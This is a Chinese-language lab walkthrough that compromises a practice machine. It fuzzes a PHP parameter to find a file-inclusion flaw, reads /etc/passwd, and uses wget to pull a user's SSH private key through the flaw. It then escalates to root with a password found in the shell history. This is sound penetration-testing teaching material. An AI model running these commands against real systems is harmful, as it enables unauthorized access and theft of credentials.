靶场搭建
下载导入,直接启动就能用。
IP:192.168.1.138
渗透过程
信息初收集
80端口的CMS是CMS Made Simple 2.2.15
。有RCE可以利用的,但是需要登录。
查看网站上的信息有两个用户qiu
和patrick
。提示了backdoor后门,就是那个RCE应该。
22/tcp open ssh
80/tcp open http
111/tcp closed rpcbind
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open zeus-admin
10080/tcp closed amanda
10443/tcp closed cirrossp
目录收集筛选一下有用的目录
[01:51:48] 200 - 17B - /phpinfo.php
[01:52:07] 200 - 80B - /test.php
[01:52:09] 200 - 1KB - /tmp/
[01:52:11] 200 - 0B - /uploads/
test.php页面需要加参数,那就fuzz一下参数。
fuzz需要牛逼的字典,所以先安装一下seclists
然后用ffuf进行参数的fuzz,先fuzz一下参数,LFI
┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.138/test.php?FUZZ=/etc/passwd' -fs 80
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.1.138/test.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 80
________________________________________________
file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 36ms]
:: Progress: [4727/4727] :: Job [1/1] :: 1025 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
找到了一个file参数的文件包含,通过passwd文件看到qiu用户有bash权限的
那么我们继续用文件包含寻找敏感的文件,shadow包不了的,包一下qiu用户下的ssh私钥
直接下载:wget http://192.168.1.138/test.php?file=/home/qiu/.ssh/id_rsa -O id_rsa
OK了家人们,直接用私钥ssh登上终端了。
提权
登录到qiu的shell之后,sudo要密码,查看一下子历史命令发现第四条是密码:remarkablyawesomE
sudo su
直接root拿下!
小结
fuzz参数,需要盘排除一下正常的size,要熟悉各种字典。